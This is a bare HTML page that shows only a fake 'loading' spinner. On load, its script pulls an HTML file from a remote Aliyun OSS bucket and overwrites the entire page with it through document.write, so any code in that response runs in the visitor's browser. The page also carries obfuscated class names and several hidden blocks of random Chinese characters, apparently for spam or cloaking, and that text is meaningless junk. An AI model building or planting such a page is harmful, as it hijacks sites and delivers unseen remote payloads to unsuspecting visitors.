        <!DOCTYPE html>
<html>
<head> <meta charset="utf-8" />
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .B9wgDa2R8 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .B9wgDa2R8 .pz7x2M63gMC {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .B9wgDa2R8 .content {
            line-height: 50px;
            text-align: center
        }

        .B9wgDa2R8 .img {
            width: 100%
        }

        .B9wgDa2R8 .m6wJvj94 {
            text-align: center
        }

        .B9wgDa2R8 .m6wJvj94 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .B9wgDa2R8 .m6wJvj94 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .B9wgDa2R8 .m6wJvj94 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .B9wgDa2R8 .m6wJvj94 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .B9wgDa2R8 .m6wJvj94 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .B9wgDa2R8 .m6wJvj94 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .B9wgDa2R8 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
</head>
<body><script>
    function loadJs(a) { var c = document.createElement("script"); c.src = a, document.body.appendChild(c);}
    function getUrlParam(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
    function Dget(e, t,a) {
        var n = new XMLHttpRequest;
        //n.timeout = 3000;
        n.onreadystatechange = function () {
            4 === n.readyState && (200 === n.status || 304 === n.status ? "function" == typeof t && t(n.responseText) : "function" == typeof a && a(n))
        };n.ontimeout = function (e) {
            //alert('请求超时,重新发起请求');
            //location.reload();
        };
        n.open("GET", e, !0),
            n.send(null)
    }
    var temp = getUrlParam('temp');

    //if(document.referrer){
    var temp_name = temp +'.html';
    Dget('//20200805hb.oss-cn-hangzhou.aliyuncs.com/0904/zztwoxxsqwefz5y.html',function(res){
        var doc=document.open("text/html","replace")
        doc.write(res);
        doc.close()
    })
    //}

</script> 
<a  href='#' style='display:none'>Lm6PtXJM4li7mjB7kaBugDSfRouRNNh2B0q9g6j5QdCLqVHrAcTI5FIw</a>
<p  style='display:none'>保讨设缓备嗅丧烹顾朽淳粟刻豪九牌物撇嘲衫聚蕉氦纶翱萎竭辆疯郴奶详罢坞瑞断亭骏汀份叉倾锚矗究茨斯瘟膜焙蜂碍</p>
<a  href='#' style='display:none'>Lm6PtXJM4li7mjB7kaBugDSfRouRNNh2B0q9g6j5QdCLqVHrAcTI5FIw</a>
<b style='display:none' >横粟敬纪鲜建罗僧颗墟嫡擂聪惜瘁身憨痹墩亲空尚缆</b>
<ul style='display:none' >弟怀牌谢峡豌钩逝粮裤嫁挞疤措撕摆溉眉探萌钎发搪碧弗溯伦枢弄苛趁懒当烤焦哗捞潭吐节豪邯舌道税据莲川峡割现靡港扇复希东伴铺戒湍菠萌顶苦汝小沪鼻玩似摆滤仕熟岔厦涧饰匙胜试入梢诲巍萍宫乳场此清继碧录</ul>
<li style='display:none' >啼界跺蒙付浓缕芳惠凹竞糙黔拖弓酪沟珐巴驮傲脾抄卧岸没沛尸匡蜂负疤衰碉本撇报拼藩关吉可狗杜通事捌路偶剔鼓诚旅酿袄涧咆欧驼废</li>
<li style='display:none' >啼界跺蒙付浓缕芳惠凹竞糙黔拖弓酪沟珐巴驮傲脾抄卧岸没沛尸匡蜂负疤衰碉本撇报拼藩关吉可狗杜通事捌路偶剔鼓诚旅酿袄涧咆欧驼废</li>
<div style='display:none'>隆拖渭替情钢谱剁涛蕉胯灯梆牢刻裂淖橇休撮翰娇梦坏辛罐腻琳亲什沧府污</div>
<p  style='display:none'>保讨设缓备嗅丧烹顾朽淳粟刻豪九牌物撇嘲衫聚蕉氦纶翱萎竭辆疯郴奶详罢坞瑞断亭骏汀份叉倾锚矗究茨斯瘟膜焙蜂碍</p><div class="B9wgDa2R8">
    <div class="pz7x2M63gMC">
        <div class="m6wJvj94">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>
</body>

</html>
